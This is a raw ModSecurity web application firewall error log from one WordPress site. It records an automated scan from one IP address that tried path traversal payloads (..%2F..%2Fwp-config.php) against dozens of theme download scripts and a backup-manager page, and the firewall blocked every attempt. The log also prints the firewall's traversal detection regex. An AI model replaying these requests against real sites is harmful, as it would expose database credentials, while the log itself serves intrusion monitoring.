"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hfr/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hfr/download.php"] [unique_id "ZN-wZkWc94tsnIsHAQ-XigAAANM"] [Fri Aug 18 12:54:46.262330 2023] [:error] [pid 19445:tid 140103334733568] [client 87.249.132.213:35274] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/storepress/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/storepress/framework/utilities/download/getfile.php"] [unique_id "ZN-wZkWc94tsnIsHAQ-XiwAAAMs"] [Fri Aug 18 12:54:46.367748 2023] [:error] [pid 19445:tid 140103225628416] [client 87.249.132.213:35276] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "ZN-wZkWc94tsnIsHAQ-XjAAAANg"] [Fri Aug 18 12:54:46.461838 2023] [:error] [pid 19445:tid 140103482758912] [client 87.249.132.213:35278] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/yaml-green/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yaml-green/download.php"] [unique_id "ZN-wZkWc94tsnIsHAQ-XjQAAAMI"] [Fri Aug 18 12:54:46.582174 2023] [:error] [pid 19445:tid 140103301162752] [client 87.249.132.213:35280] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/itchyrobot_parent/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/itchyrobot_parent/download.php"] [unique_id "ZN-wZkWc94tsnIsHAQ-XjgAAAM8"] [Fri Aug 18 12:54:46.676860 2023] [:error] [pid 19445:tid 140103474366208] [client 87.249.132.213:35282] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mh-magazine-lite/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mh-magazine-lite/down.php"] [unique_id "ZN-wZkWc94tsnIsHAQ-XjwAAAMM"] [Fri Aug 18 12:54:46.787057 2023] [:error] [pid 19445:tid 140103368304384] [client 87.249.132.213:35284] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/seacad/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/seacad/inc/download.php"] [unique_id "ZN-wZkWc94tsnIsHAQ-XkAAAAMc"] [Fri Aug 18 12:54:46.903581 2023] [:error] [pid 19445:tid 140103292770048] [client 87.249.132.213:35286] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/theme-wpaitaliadigitale-full/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/theme-wpaitaliadigitale-full/down.php"] [unique_id "ZN-wZkWc94tsnIsHAQ-XkQAAANA"] [Fri Aug 18 12:54:46.998377 2023] [:error] [pid 19445:tid 140103317948160] [client 87.249.132.213:35288] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/jamesaltucher/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/jamesaltucher/download.php"] [unique_id "ZN-wZkWc94tsnIsHAQ-XkgAAAM0"] [Fri Aug 18 12:54:47.106138 2023] [:error] [pid 19445:tid 140103275984640] [client 87.249.132.213:35290] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fluidracountry/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fluidracountry/download.php"] [unique_id "ZN-wZ0Wc94tsnIsHAQ-XkwAAANI"] [Fri Aug 18 12:54:47.207885 2023] [:error] [pid 19445:tid 140103457580800] [client 87.249.132.213:35292] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/responsive-visual/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/responsive-visual/includes/download.php"] [unique_id "ZN-wZ0Wc94tsnIsHAQ-XlAAAAMU"] [Fri Aug 18 12:54:47.366934 2023] [:error] [pid 19445:tid 140103284377344] [client 87.249.132.213:35294] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/quark/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/quark/download.php"] [unique_id "ZN-wZ0Wc94tsnIsHAQ-XlQAAANE"] [Fri Aug 18 12:54:47.798874 2023] [:error] [pid 19445:tid 140103359911680] [client 87.249.132.213:35296] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/todays/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/todays/download.php"] [unique_id "ZN-wZ0Wc94tsnIsHAQ-XlgAAAMg"] [Fri Aug 18 12:54:47.906716 2023] [:error] [pid 18873:tid 140103242413824] [client 87.249.132.213:35298] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/banftheme/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/banftheme/download.php"] [unique_id "ZN-wZ7CcrCl0jrDdhfxXQAAAAFY"] [Fri Aug 18 12:54:48.014638 2023] [:error] [pid 18873:tid 140103368304384] [client 87.249.132.213:35300] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/placid/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/placid/download.php"] [unique_id "ZN-waLCcrCl0jrDdhfxXQQAAAEc"] [Fri Aug 18 12:54:48.141279 2023] [:error] [pid 18873:tid 140103491151616] [client 87.249.132.213:35302] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/metz/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/metz/download.php"] [unique_id "ZN-waLCcrCl0jrDdhfxXQgAAAEE"] [Fri Aug 18 12:54:48.249069 2023] [:error] [pid 19445:tid 140103343126272] [client 87.249.132.213:35306] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/caledobio/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/caledobio/framework/utilities/download/getfile.php"] [unique_id "ZN-waEWc94tsnIsHAQ-XmAAAAMo"] [Fri Aug 18 12:54:48.357090 2023] [:error] [pid 19445:tid 140103250806528] [client 87.249.132.213:35308] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mingle/framework/utilities/download/getfile.php"] [unique_id "ZN-waEWc94tsnIsHAQ-XmQAAANU"] [Fri Aug 18 12:54:48.487676 2023] [:error] [pid 18874:tid 140103301162752] [client 87.249.132.213:35310] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/accesspress-store/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/accesspress-store/download.php"] [unique_id "ZN-waFxvK4MFoveIP9_KqAAAAI8"] [Fri Aug 18 12:54:48.590723 2023] [:error] [pid 18872:tid 140103275984640] [client 87.249.132.213:35312] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/PlixPro/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/PlixPro/download.php"] [unique_id "ZN-waPG_rKmCSnA6LxD5hAAAABI"] [Fri Aug 18 12:54:48.685799 2023] [:error] [pid 18872:tid 140103457580800] [client 87.249.132.213:35314] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/haarperfect/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/haarperfect/framework/utilities/download/getfile.php"] [unique_id "ZN-waPG_rKmCSnA6LxD5hQAAAAU"] [Fri Aug 18 12:54:48.803559 2023] [:error] [pid 19445:tid 140103234021120] [client 87.249.132.213:35316] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/tools.php"] [unique_id "ZN-waEWc94tsnIsHAQ-XmgAAANc"] [Fri Aug 18 12:54:49.829157 2023] [:error] [pid 19445:tid 140103267591936] [client 87.249.132.213:35320] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal 